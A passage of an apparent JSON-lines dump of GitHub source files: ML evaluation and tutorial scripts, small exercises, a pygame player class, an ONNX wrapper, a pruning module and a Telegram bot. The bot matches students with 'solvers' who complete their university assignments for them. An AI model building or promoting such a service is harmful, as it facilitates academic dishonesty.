skip_special_tokens=True)\n for j in range(len(output)):\n predictions.append(\n {\n \"question\": examples[\"problem\"][j],\n \"ground_truth\": examples['solution'][j],\n \"prediction\": output[j]\n }\n )\n count += len(output)\n print(count)\n\nwith open('data/predictions/gsm8k/Arithmo-Mistral-7B/predictions_Arithmo_MATH_zero_shot_CoT.json', 'w') as f:\n json.dump(predictions, f, indent=1)\n\n\n","repo_name":"akjindal53244/Arithmo-Mistral-7B","sub_path":"eval/MATH/MATH_generate_response_zero_shot_CoT.py","file_name":"MATH_generate_response_zero_shot_CoT.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"34949761261","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\n\"\"\"\nIn the main function load a data set of municipal information\nfrom the src folder (originally from Statistics Finland). 
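For illustration, a self-contained version of the read-and-report pattern this docstring describes (inline data instead of the real file; the municipalities and numbers are made up):

import io
import pandas as pd

tsv = "name\tpopulation\nHelsinki\t653835\nEspoo\t283632\n"
df = pd.read_csv(io.StringIO(tsv), sep="\t")  # tab-separated, like municipal.tsv
r, c = df.shape
print(f"Shape: {r},{c}")   # Shape: 2,2
print("Columns:")
for col in df.columns:
    print(col)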
Use\nthe function pd.read_csv(), and note that the separator is a\ntabulator.\n\nPrint the shape of the DataFrame (number of rows and columns)\nand the column names in the following format:\n\nShape: r,c\nColumns:\ncol1 \ncol2\n...\n\"\"\"\n\ndef main():\n data_frame = pd.read_csv(\"src/municipal.tsv\", sep=\"\\t\")\n\n rows, columns = data_frame.shape\n\n print(f\"Shape: {rows},{columns}\")\n print(\"Columns:\")\n for i in data_frame:\n print(i)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjauvo/MOOC_Data_Analysis_with_Python_2022","sub_path":"part04/part04-e03_municipal_information/src/municipal_information.py","file_name":"municipal_information.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7176837060","text":"def insertionsort(l):\n n = len(l)\n if n < 1:\n return l\n for i in range(n):\n j=i\n while(j>0 and l[j][0]0 and int(l[j][1:])= len(animation):\n self.frame_index = 0\n \n image = animation[int(self.frame_index)]\n\n if self.facing_right:\n self.image = image\n else:\n flipped_image = pygame.transform.flip(image, True, False)\n self.image = flipped_image\n \n # set the rect\n if self.on_ground and self.on_right:\n self.rect = self.image.get_rect(bottomright = self.rect.bottomright)\n elif self.on_ground and self.on_left:\n self.rect = self.image.get_rect(bottomleft = self.rect.bottomleft)\n elif self.on_ground:\n self.rect = self.image.get_rect(midbottom = self.rect.midbottom)\n if self.on_ceiling and self.on_right:\n self.rect = self.image.get_rect(topright = self.rect.topright)\n elif self.on_ceiling and self.on_left:\n self.rect = self.image.get_rect(topleft = self.rect.topleft)\n elif self.on_ceiling:\n self.rect = self.image.get_rect(midtop = self.rect.midtop)\n else:\n self.rect = self.image.get_rect(center = self.rect.center)\n\n\n def get_input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.direction.x = 1\n self.facing_right = True\n elif keys[pygame.K_LEFT]:\n self.direction.x = -1\n self.facing_right = False\n else:\n self.direction.x = 0\n\n if keys[pygame.K_c] and (keys[pygame.K_c] != self.keys_hist[pygame.K_c]) and self.direction.x != 0 and self.dashes > 0:\n pygame.mixer.Sound.play(self.dash_sound)\n self.direction.x *= 15\n self.dashes -= 1\n\n if keys[pygame.K_SPACE] and self.on_ground:\n\n pygame.mixer.Sound.play(self.jump_sound)\n\n self.jump()\n\n self.keys_hist = keys\n\n \n def get_state(self):\n if self.direction.y < 0:\n self.state = 'jump'\n self.animation_speed = 0.1\n elif self.direction.y > self.gravity:\n self.state = 'fall'\n self.animation_speed = 0.1\n elif self.direction.x != 0:\n self.state = 'run'\n self.animation_speed = 0.3\n else:\n self.state = 'idle'\n self.animation_speed = 0.15\n \n\n def apply_gravity(self):\n self.direction.y += self.gravity\n self.rect.y += self.direction.y\n \n \n def jump(self):\n self.direction.y = self.jump_speed\n \n def update(self):\n self.get_input()\n self.get_state()\n self.animate()\n","repo_name":"const-sambird/hacklahoma23","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25759397242","text":"\"\"\"\r\n@author: JerryYang\r\n@file: openai改造01.py\r\n@time: 2023/2/6 15:00\r\n@desc: Added feature: convert the returned data to speech with the pyttsx3 module\r\n\"\"\"\r\n\r\nimport pyttsx3\r\nimport openai\r\n\r\nopenai.api_key = 
'************************8'\r\n\r\nques = input(\"Enter the question you want to ask: \")\r\nresponse = openai.Completion.create(\r\n model=\"text-davinci-003\",\r\n prompt=f\"Q:{ques}?\\nA:\",\r\n temperature=0,\r\n max_tokens=1024,\r\n top_p=1.0,\r\n frequency_penalty=0.0,\r\n presence_penalty=0.0\r\n)\r\nprint(response)\r\n# resp_text = response.get('choices')[0].get('text')\r\nresp_text = response.choices[0].text\r\n# print(type(response.get('choices')))\r\n# print(type(response.get('choices')[0]))\r\nprint(\"Q:\", ques)\r\nprint(\"AI answer:\", resp_text)\r\n\r\n# resp_text = 'The weather forecast for Foshan, Guangdong, China tomorrow is sunny turning cloudy, high 30℃, low 22℃, wind force 3-4.'\r\n\r\n# initialize the tts engine\r\nengine = pyttsx3.init()\r\n\r\n# get the list of voices\r\nvoices = engine.getProperty('voices')\r\n# loop over the voices and speak with each one\r\nfor voice in voices:\r\n # set the speaker voice\r\n engine.setProperty('voice', voice.id)\r\n print(voice.id)\r\n # call the engine say() method to start reading aloud\r\n engine.say(resp_text)\r\n\r\n# wait for the speech to finish playing\r\nengine.runAndWait()\r\n\r\n'''\r\nRun output:\r\nD:\\pythonProject\\pythonProject\\openai\\Scripts\\python.exe D:/pythonProject/pythonProject/openai-demo.py\r\n\r\n\r\nThe weather forecast for Foshan, Guangdong, China tomorrow is sunny turning cloudy, high 30℃, low 22℃, wind force 3-4.\r\n\r\nProcess finished with exit code 0\r\n'''\r\n\r\n'''\r\n# Parameters\r\n model: the model to use: \"code-davinci-002\"/\"text-davinci-003\"\r\n prompt: the generation prompt; note that each model expects a different prompt style\r\n temperature: novelty sampling; raise the value to make results more original\r\n top_p: nucleus sampling\r\n frequency_penalty: frequency penalty coefficient\r\n presence_penalty: repetition (presence) penalty coefficient\r\n stop: stop words\r\n\r\n'''\r\n'''\r\nSpeech rate control\r\nengine = pyttsx3.init()\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', rate+50)\r\nengine.say('The quick brown fox jumped over the lazy dog.')\r\nengine.runAndWait()\r\n\r\nVolume control\r\nengine = pyttsx3.init()\r\nvolume = engine.getProperty('volume')\r\nengine.setProperty('volume', volume-0.25)\r\nengine.say('The quick brown fox jumped over the lazy dog.')\r\nengine.runAndWait()\r\n'''\r\n'''\r\nEnter the question you want to ask: Below are the manufacturing inspection pass rates of four factories of a company; please analyse the problems: 8010: 86.1%, 8020: 99.1%, 8030: 94.4%, 8040: 93.0%, 8050: 87.3%\r\n\r\nFrom the data above, factory 8020 has the highest inspection pass rate at 99.1%, while factory 8050 has the lowest at only 87.3%, which indicates that quality control at factory 8050 is problematic and needs stronger management and improved processes.\r\n'''\r\n","repo_name":"JerryYangJ/MyFirstProject","sub_path":"openai/openai改造02.py","file_name":"openai改造02.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9398618348","text":"import onnxruntime as rt\nimport os\nimport numpy as np\nfrom pathlib import Path\n\n\nROOT = Path(os.path.realpath(os.path.expanduser(__file__))).parents[0]\nSESS = rt.InferenceSession(str(ROOT / \"fashion-mnist.onnx\"))\n\n\nclass Model(object):\n onnx_session = SESS\n input_name = onnx_session.get_inputs()[0].name\n\n class_names = [\n 'T-shirt/top',\n 'Trouser',\n 'Pullover',\n 'Dress',\n 'Coat',\n 'Sandal',\n 'Shirt',\n 'Sneaker',\n 'Bag',\n 'Ankle boot'\n ]\n\n @staticmethod\n def metadata():\n return {\n 'signature_name': 'serving_default',\n 'inputs': {\n 'image_data': {\n 'dtype': 'float'\n }\n },\n 'outputs': {\n 'class_probabilities': {\n 'dtype': 'float'\n }\n }\n }\n\n @classmethod\n def predict(cls, data):\n y_pred = cls.onnx_session.run(\n None,\n {\n cls.input_name: data['image_data'].astype(np.float32)\n }\n )\n\n return y_pred\n","repo_name":"cwetherill-ps/onnx-deployment","sub_path":"models/fashion-mnist/fashion-mnist.py","file_name":"fashion-mnist.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70759161645","text":"def main():\n word = input(\"Input: \")\n print(f\"Output: 
{shorten(word)}\")\n\n\ndef shorten(word: str) -> str:\n \"\"\"\n Shorten a word by removing vowels\n Args:\n word: a string inputted that may have vowels either upper or lower case\n Returns: a copy of the inputted word but without any vowels\n \"\"\"\n vowels = ['a', 'e', 'u', 'o', 'i', 'A', 'E', 'U', 'I', 'O']\n shorten_word = word\n for char in word:\n # This if-statement just make sure that the sentence will have meanings if it starts with a vowel like 'i'\n # if char == word[0]:\n # continue\n if char in vowels:\n shorten_word = shorten_word.replace(char, '')\n return shorten_word\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DeoGM2911/CS50P","sub_path":"set5/twttr/twttr.py","file_name":"twttr.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"26880236924","text":"import tensorflow as tf\n\nfrom mayo.override import util\nfrom mayo.override.base import Parameter\nfrom mayo.override.prune.base import PrunerBase\n\n\nclass FilterPruner(PrunerBase):\n density = Parameter('density', 0.0, [], 'float')\n mask = Parameter('mask', None, None, 'bool')\n\n def __init__(self, session, density=None, should_update=True):\n super().__init__(session, should_update)\n self.density = density\n\n def _apply(self, value):\n self._parameter_config = {\n 'mask': {\n 'initial': tf.ones_initializer(dtype=tf.bool),\n 'shape': tf.TensorShape([value.shape[-2], value.shape[-1]]),\n }\n }\n return value * util.cast(self.mask, float)\n\n def _l1_norm(self, value):\n # compute l1 norm for each filter\n axes = len(value.shape)\n assert axes == 4\n # mean, var = tf.nn.moments(util.abs(tensor), axes=[0, 1])\n # mean = np.mean(value, axis=(0, 1))\n # var = np.var(value, axis=(0, 1))\n # return mean + util.sqrt(var)\n return util.sum(util.abs(value), axis=(0, 1))\n\n def _threshold(self, value, density):\n value = value.flatten()\n index = int(value.size * density)\n return sorted(value)[index]\n\n def _updated_mask(self, tensor, mask):\n value, mask, density = self.session.run([tensor, mask, self.density])\n l1_norm = self._l1_norm(value)\n # mean, var = tf.nn.moments(util.abs(tensor), axes=[0, 1])\n return l1_norm > self._threshold(l1_norm, density)\n\n def _info(self):\n _, mask, density, count = super()._info()\n density = self.session.run(self.density)\n return self._info_tuple(\n mask=mask, density=density, count_=count)\n\n @classmethod\n def finalize_info(cls, table):\n footer = super().finalize_info(table)\n table.set_footer([None] + footer)\n","repo_name":"deep-fry/mayo","sub_path":"mayo/override/prune/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"19"} +{"seq_id":"27959370779","text":"import os\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\n\n'''Neural Network'''\n\n# neural network\n# is a collection of neurons that are connected by layers\n# each neuron is a small computing unit\n# that performs simple calculations to collectively solve a problem\n# they are organised in layers\n# 3 types of layers - input layer, hidden layer and outter layer\n# Each layers contain a number of neurons, except for the input layer\n\n# components of a neural network\n# activation function -\n# determines whether a neuron should be activated or not\n# if a neuron activates, then it means the input is 
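The FilterPruner above scores each filter slice by its L1 norm and thresholds at the density quantile; a standalone NumPy restatement of that masking logic (the weight shape below is made up, this is not the Mayo API):

import numpy as np

# hypothetical conv kernel: (kernel_h, kernel_w, in_channels, out_channels)
w = np.random.randn(3, 3, 16, 32)
density = 0.5

l1 = np.sum(np.abs(w), axis=(0, 1))          # one L1 norm per (in, out) slice, shape (16, 32)
threshold = np.sort(l1.flatten())[int(l1.size * density)]
mask = l1 > threshold                        # keeps roughly the top (1 - density) of filters
print(mask.shape, mask.mean())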
important\n# it adds non-linearity to the model\n\n# Weights\n# influence how well the output of our network will come close to the expected output value\n# weights for all neurons in a layer are organised into one tensor\n\n# bias\n# makes up the difference between the activation function's output and its intended output\n\n\n'''Build a neural network'''\n# neural networks are comprised of layers/modules that perform operations on data\n# torch.nn - provides all the building blocks you need to build your own neural network\n# Every module in pytorch subclasses the nn.module\n# a neural network is a module itself that consists of other modules (layers)\n\n\n# to check if torch.cuda is availble, else use cpu\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nprint('Using {} device'.format(device))\n\n# every nn.module subclass implements the operations on input data in the forward method\n\n\nclass NeuralNetwork(nn.Module):\n def __init__(self):\n super(NeuralNetwork, self).__init__()\n self.flatten = nn.Flatten()\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(28*28, 512), # First linear Module - input layer 28*28 or 784 features - takes this and transform it to a hidden layer with 512 features\n nn.ReLU(),\n nn.Linear(512, 512), # Second linear Module - take 512 features as input from the first hidden layer and transforms it to the next hidden layer with 512 features\n nn.ReLU(),\n nn.Linear(512, 10), # Third linear Module - take 512 features as input from the second hidden layer and transforms it to the output layer with 10\n nn.ReLU(),\n )\n\n def forward(self, x):\n x = self.flatten(x)\n logits = self.linear_relu_stack(x)\n return logits\n\n\nmodel = NeuralNetwork().to(device)\nprint(model)\n\n\n# to use the model, we pass it the input data\n# this executes the models forward, along with some background operations\n\nX = torch.rand(1, 28, 28, device=device)\n# print(X)\nlogits = model(X)\npred_probab = nn.Softmax(dim=1)(logits)\ny_pred = pred_probab.argmax(1)\nprint(f\"Predicted class: {y_pred}\")\n\n'''Weight and bias'''\n# nn.linear module randomly initializes the weight and bias for each layer\n\nprint(f\"First Linear weights: {model.linear_relu_stack[0].weight} \\n\")\nprint(f\"First linear bias: {model.linear_relu_stack[0].bias}\\n\")\n\n# model layers - 3 images of size 28*28\ninput_image = torch.rand(3,28,28)\nprint(input_image.size())\n\n# nn.flatten layer - to convert each 2d 28*28 image into 784 pixel\nflatten = nn.Flatten()\nflat_image = flatten(input_image)\nprint(flat_image.size())\n\n# nn.Linear\n# a module that applies a linear transformation on the input using it's stored weights and biases\nlayer1 = nn.Linear(in_features=28*28, out_features=20)\nhidden1 = layer1(flat_image)\nprint(hidden1.size())\n\n# nn.ReLU\n# the ReLU activation function takes the output from the linear layer calculation and replaces the negative values with zero\nprint(f\"Before ReLU: {hidden1}\\n\\n\")\nhidden1 = nn.ReLU()(hidden1)\nprint(f\"After RELU:{hidden1}\\n\\n\")\n\n# nn.sequential\n\nseq_modules = nn.Sequential(\n flatten,\n layer1,\n nn.ReLU(),\n nn.Linear(20, 10)\n)\ninput_image = torch.rand(3, 28, 28)\nprint(input_image)\nlogits = seq_modules(input_image)\nprint(\" \")\nprint(logits)\n\nprint(\" \")\nsoftmax = nn.Softmax(dim=1)\npred_probab = softmax(logits)\nprint(pred_probab)\n\nprint(\"model structure: \", model, \"\\n\\n\")\n\nfor name, param in model.named_parameters():\n print(f\"Layer: {name} | Size: {param.size()} | Values : {param[:2]} 
\\n\")\n\n","repo_name":"bethelmelesse/pytorch_azure_02","sub_path":"unit_4.py","file_name":"unit_4.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31113148297","text":"#!/usr/bin/python3\nfrom aiogram.utils import executor\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher import FSMContext\nfrom middlewares import rate_limit\nfrom memory_profiler import memory_usage\nimport numpy as np\nfrom functions import *\nfrom loader import *\n\n\n# ---------------------------------------------------- handlers ----------------------------------------------------\n@dp.message_handler(content_types=['sticker'])\nasync def get_sticker_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.sticker.file_id)\n\n\n@dp.message_handler(commands=['get_mess_id'])\nasync def get_mess_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.message_id)\n\n\n@dp.message_handler(commands=['make_dot'])\nasync def return_message_id(message: types.Message):\n if message.from_user.id == config.admin_id:\n res = await bot.send_message(config.profile_id, '.')\n await bot.send_message(config.admin_id, res)\n\n\n@dp.message_handler(commands=['make_rating'])\nasync def make_rating(message: types.Message):\n if message.from_user.id in config.admins_list:\n await make_rating_func()\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['start'])\nasync def start(message: types.Message):\n if message.chat.type == 'private':\n if not DB.user_exists(message.from_user.id):\n try:\n await bot.send_sticker(message.from_user.id,\n sticker='CAACAgIAAxkBAAIC2GKAGAP-qBGC5YInxh5PRu_8qJ_AAAKkHgAC1NEAAUgEnMSQXPUUySQE')\n except:\n pass\n\n mess = f\"Здравствуй, {message.from_user.first_name} ! Приветствуем👋 вас в боте, \" \\\n f\"созданном для оперативного(быстрого) нахождения исполнителя какого-либо вузовского задания. \" \\\n f\"Будь то чертёж по начерталке✏️, или же расчётка по сопромату, ты точно найдёшь нужного тебе человека🤝.\" \\\n f\"\\n\\nМы - те, кто не первый год помогаем ребятам с различным проблемами.\" \\\n f\" И дабы облегчить вам процесс нахождения 🔎 помощника, мы создали этого бота.\" \\\n f\"\\n\\nСоветую нажать /help ,чтобы разобраться в функционале.\"\n await bot.send_message(message.chat.id, mess)\n mess = 'P.S. 
 +{"seq_id":"31113148297","text":"#!/usr/bin/python3\nfrom aiogram.utils import executor\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher import FSMContext\nfrom middlewares import rate_limit\nfrom memory_profiler import memory_usage\nimport numpy as np\nfrom functions import *\nfrom loader import *\n\n\n# ---------------------------------------------------- handlers ----------------------------------------------------\n@dp.message_handler(content_types=['sticker'])\nasync def get_sticker_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.sticker.file_id)\n\n\n@dp.message_handler(commands=['get_mess_id'])\nasync def get_mess_id(message: types.Message):\n if message.from_user.id in config.admins_list:\n await message.answer(message.message_id)\n\n\n@dp.message_handler(commands=['make_dot'])\nasync def return_message_id(message: types.Message):\n if message.from_user.id == config.admin_id:\n res = await bot.send_message(config.profile_id, '.')\n await bot.send_message(config.admin_id, res)\n\n\n@dp.message_handler(commands=['make_rating'])\nasync def make_rating(message: types.Message):\n if message.from_user.id in config.admins_list:\n await make_rating_func()\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['start'])\nasync def start(message: types.Message):\n if message.chat.type == 'private':\n if not DB.user_exists(message.from_user.id):\n try:\n await bot.send_sticker(message.from_user.id,\n sticker='CAACAgIAAxkBAAIC2GKAGAP-qBGC5YInxh5PRu_8qJ_AAAKkHgAC1NEAAUgEnMSQXPUUySQE')\n except:\n pass\n\n mess = f\"Hello, {message.from_user.first_name}! Welcome👋 to a bot built for quickly finding someone to do a university assignment. \" \\\n f\"Whether it is a descriptive-geometry drawing✏️ or a strength-of-materials calculation, you will surely find the right person here🤝.\" \\\n f\"\\n\\nWe have been helping students with all kinds of problems for years now.\" \\\n f\" And to make the search 🔎 for a helper easier for you, we created this bot.\" \\\n f\"\\n\\nI suggest pressing /help to get familiar with the features.\"\n await bot.send_message(message.chat.id, mess)\n mess = 'P.S. the developers of the bot bear no responsibility for the interactions between users'\n await bot.send_message(message.chat.id, mess)\n DB.new_row_user_db(user_id=message.from_user.id, name=message.from_user.first_name)\n DB.all_users_list = DB.all_list()\n\n start_command = message.text\n refer_id = str(start_command[7:])\n if str(refer_id) != '':\n if str(refer_id) != str(message.from_user.id):\n DB.update_in_user(user_id=message.from_user.id, dict_values={'refer_id': int(refer_id)})\n try:\n await bot.send_message(refer_id, 'A new user has registered via your link!')\n except:\n pass\n else:\n await message.answer('You cannot register with your own link!')\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['my_profile'])\nasync def my_profile(message: types.Message):\n if message.chat.type == 'private':\n user_id = message.from_user.id\n if user_id in DB.ban_users_list:\n await message.answer('You are banned!')\n return\n count_refer = DB.get_count_referals(user_id=user_id)\n refer_info = f'Your referral link:\\n' \\\n f'https://t.me/{config.BOT_NICKNAME}?start={message.from_user.id}\\n' \\\n f'Number of referrals: {count_refer}\\n'\n if DB.decider_exists(user_id):\n profile_id = DB.get_profile_id(user_id)\n await bot.forward_message(chat_id=user_id,\n from_chat_id=config.profile_id,\n message_id=profile_id)\n text = '\\nPress:\\n' \\\n '\\nEdit profile - if you want to change your university name, ' \\\n 'or add or remove a subject📖 \\n\\n' \\\n 'Close profile - if you want to stop being a Solver, for a while ' \\\n 'or for good. You will no longer receive orders ' \\\n 'until you decide to rejoin the Solvers and reopen your profile💪🏻 ' \\\n '\\nAll your reviews and ratings will be kept.'\n await bot.send_message(user_id, text, reply_markup=Markup.key_profile_manage, parse_mode='HTML')\n await bot.send_message(user_id, refer_info)\n elif DB.dunno_exists(user_id):\n mess = 'For now you have a regular customer profile.\\n' \\\n 'Would you like to create a Solver profile?'\n await bot.send_message(message.from_user.id, mess, reply_markup=Markup.choice_1)\n await bot.send_message(user_id, refer_info)\n else:\n await bot.send_message(message.from_user.id,\n 'Hmm... it seems you skipped the initial registration, please press /start')\n\n\n@dp.callback_query_handler(text_contains='profile_manage')\nasync def profile_manage(call: types.CallbackQuery):\n data_call = call.data.split(':')[-1]\n if data_call == 'make':\n await bot.send_message(call.from_user.id, \"Type the name of your university (abbreviated)\")\n await regist_decider.waiting_regist_univer.set()\n elif data_call == 'del':\n user_id = call.from_user.id\n profile_id = DB.get_profile_id(user_id)\n await bot.edit_message_text('Profile closed', chat_id=config.profile_id, message_id=profile_id)\n DB.delete_user(user_id, sub=True)\n dict_values = {'decider': False,\n 'subject_count': 0}\n DB.update_in_user(user_id, dict_values)\n await call.message.edit_text('Your Solver profile is closed. But you can always become a Solver again, '\n 'just press the /my_profile command. 
\\n'\n 'If the service did not suit you, you can tell the admins about it via the '\n '/help_me command',\n reply_markup=None)\n\n\n@dp.callback_query_handler(text_contains='profile_make', state=\"*\")\nasync def new_profile_make(call: types.CallbackQuery):\n # await bot.delete_message(call.from_user.id, call.message.message_id)\n data_call = call.data.split(':')[-1]\n if data_call == 'info':\n mess = ' A performer - simply put, a Solver💪🏻\\n' \\\n '📌Through the bot a customer sends a task, which arrives to you as a chat message 📨. ' \\\n 'You only receive messages for the subjects marked in your profile. ' \\\n 'Then it is up to you - accept the job or turn it down 🛠\\n\\n' \\\n 'If the customer picks you as their Solver, ' \\\n 'they will message you directly and ask whatever questions they have🧐\\n\\n' \\\n 'Would you like to become a Solver?💪🏻'\n await call.message.edit_text(mess, reply_markup=Markup.choice_2)\n elif data_call == 'yes':\n await call.message.edit_text('Creating a profile', reply_markup=None)\n await call.message.answer(\"Type the name of your university (abbreviated)\")\n await regist_decider.waiting_regist_univer.set()\n elif data_call == 'no':\n await call.message.edit_text('You cancelled the action', reply_markup=None)\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['help'])\nasync def help(message: types.Message):\n # show different info depending on the profile type\n if message.from_user.id in DB.ban_users_list:\n await message.answer('https://www.youtube.com/watch?v=2Q_ZzBGPdqE')\n return\n mess = '📌Thanks for pressing. Statistically 67% of people never read the manual, but let us not dwell on that. \\n\\n' \\\n 'The bot commands are listed below:\\n\\n' \\\n '/send - the main command for finding a Solver for a given subject 🤝\\n\\n' \\\n '/my_profile - shows your status and lets you become a Solver💪\\n\\n' \\\n '/info - detailed instructions on finding a Solver🔎\\n\\n' \\\n '/help_me - if you ran into a problem, noticed a bug, or simply want to suggest ' \\\n 'an improvement to the bot🤖\\n' \\\n 'The administrators will read it and reply as soon as they can❤️' \\\n 'We also have our own stickers https://t.me/addstickers/reshals'\n\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n mess = f'''To donate to the developers: \\ntap to copy \\n`{config.card_num}`'''\n await bot.send_message(message.chat.id, mess, parse_mode='markdown')\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['info'])\nasync def info(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('https://www.youtube.com/watch?v=2Q_ZzBGPdqE')\n return\n mess = 'How to work with the bot:\\n\\n' \\\n 'To find a Solver for your subject, send the task to the bot:\\n\\n' \\\n '1. Press the Menu button and send the /send command\\n' \\\n '2. Pick the subject you want help with🤝\\n' \\\n '3. Describe the task to the bot in detail ' \\\n 'and send it. Attach a photo or a file with the task if needed✉️\\n' \\\n '4. As soon as one or more Solvers respond ⏰ to your task, ' \\\n 'you will get a reply with their links, profiles and, possibly, a comment on the task.\\n' \\\n '5. Once you have settled on a Solver, press Choose Solver🚀\\n' \\\n '6. 
You need to follow the link of the Solver you chose🙋🏼 and ' \\\n 'ask them all your questions directly.'\n if DB.decider_exists(message.from_user.id):\n mess += '\\n\\n\\nInstructions for Solvers:\\n\\n' \\\n 'When an order comes to you:\\n' \\\n '- You can respond, so that your application can be considered. \\n' \\\n 'When responding, you can leave a comment about the order.\\n' \\\n '- Or report it, if you found inappropriate content.\\n' \\\n 'The report goes to the administrators and they will review it\\n\\n' \\\n 'After your profile is sent, the customer may contact you in a private message'\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n return\n mess += '\\n\\nYou also have the option to become a Solver yourself, ' \\\n 'just press /my_profile and follow the instructions'\n await bot.send_message(message.chat.id, mess, parse_mode='html')\n\n\n@dp.message_handler(commands=['helpa'])\nasync def helpa(message: types.Message):\n if await main_admin_test(message):\n await keyboard_admin(message)\n if await admins_test(message):\n mess = 'Admin commands:\\n' \\\n '- Reply to a specific user by id \\n' \\\n '/answer_user [user id] message text \\n' \\\n '- Ban a user\\n' \\\n '/ban_user [user id] \\n' \\\n '- Broadcast \\n' \\\n '/public \\n' \\\n '- Delete a user \\n' \\\n '/delete_user id_user \\n' \\\n '- Get statistics \\n' \\\n '/statistics'\n await message.answer(mess)\n\n\nclass send_help_me_state(StatesGroup):\n send_help = State()\n\n\n@rate_limit(limit=3)\n@dp.message_handler(commands=['help_me'])\nasync def help_me(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('You are banned!')\n return\n keyb = types.ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = ['Cancel']\n keyb.add(*buttons)\n await message.answer('Write a message to support. If you want to cancel sending, type \"Cancel\"',\n reply_markup=keyb)\n await send_help_me_state.send_help.set()\n\n\n@dp.message_handler(state=send_help_me_state.send_help, content_types=['text'])\nasync def send_help_me(message: types.Message, state: FSMContext):\n if message.text.lower() == 'cancel':\n await bot.send_message(message.chat.id, 'Sending cancelled', reply_markup=types.ReplyKeyboardRemove())\n else:\n print(1)\n key = await Markup.ban_user(message.from_user.id)\n print(2)\n print(3)\n await bot.send_message(config.SUPPORT_ID,\n text=f'@{message.from_user.username} {message.from_user.id}',\n parse_mode='html',\n reply_markup=key)\n print(4)\n await bot.forward_message(chat_id=config.SUPPORT_ID,\n from_chat_id=message.from_user.id,\n message_id=message.message_id)\n print(5)\n await message.answer('Your message has been sent to the admins, '\n 'we will try to resolve your issue as soon as possible',\n reply_markup=types.ReplyKeyboardRemove())\n\n await state.finish()\n\n\nclass send_task(StatesGroup):\n choice_sub = State()\n give_task = State()\n\n\n@logger.catch()\n@rate_limit(limit=config.limit_send)\n@dp.message_handler(commands=['send'])\nasync def send(message: types.Message):\n if message.from_user.id in DB.ban_users_list:\n await message.answer('You are banned!')\n return\n elif not DB.user_exists(message.from_user.id):\n await bot.send_message(message.from_user.id,\n 'Hmm... 
it seems you skipped the initial registration, please press /start')\n elif message.chat.type == 'private':\n key = await Markup.subjects_task_with_see(config.all_subjects[1:])\n await message.answer('Pick a subject', reply_markup=key)\n await send_task.choice_sub.set()\n else:\n await message.answer('You can only message the bot in a private chat')\n\n\n@dp.callback_query_handler(text_contains='all_subjects_task', state=send_task.choice_sub)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n if data_call == 'see':\n keyboard_hide = await Markup.subjects_task_with_hide(config.all_subjects[1:])\n mess = config.info_subs_mess\n await call.message.edit_text(mess, reply_markup=keyboard_hide)\n elif data_call == 'hide':\n keyboard_see = await Markup.subjects_task_with_see(config.all_subjects[1:])\n mess = 'Pick a subject'\n await call.message.edit_text(mess, reply_markup=keyboard_see)\n else:\n await state.update_data(sub=data_call)\n await call.message.edit_text(f'You picked {data_call}', reply_markup=None)\n await bot.send_message(call.from_user.id, 'Now send the task in a single message. \\n'\n 'You can attach a photo or a document to the message, '\n 'or just send plain text describing the task.')\n await send_task.next()\n\n\n@dp.message_handler(state=send_task.give_task, content_types=['text', 'photo', 'document'])\nasync def give_task(message: types.Message, state: FSMContext):\n await state.update_data(task_message=message)\n await message.reply('Confirm sending the task', reply_markup=Markup.confirm_task)\n\n\n@logger.catch()\n@dp.callback_query_handler(text_contains='confirm_task_from_user', state=send_task.give_task)\nasync def keyboard_subjects_task(call: types.CallbackQuery, state: FSMContext):\n data_call = call.data.split(':')[-1]\n user_id = call.from_user.id\n task_data = await state.get_data()\n if data_call == 'yes':\n send_list_id = DB.get_list_desiders(task_data['sub'])\n if len(send_list_id) == 0:\n mess = 'Unfortunately, no Solver was found for this subject. '\n await call.message.edit_text(mess, reply_markup=None)\n else:\n DB.activity_users_dict['send'] += 1\n mess = f'Number of Solvers for your subject: {len(send_list_id)} \\n' \\\n 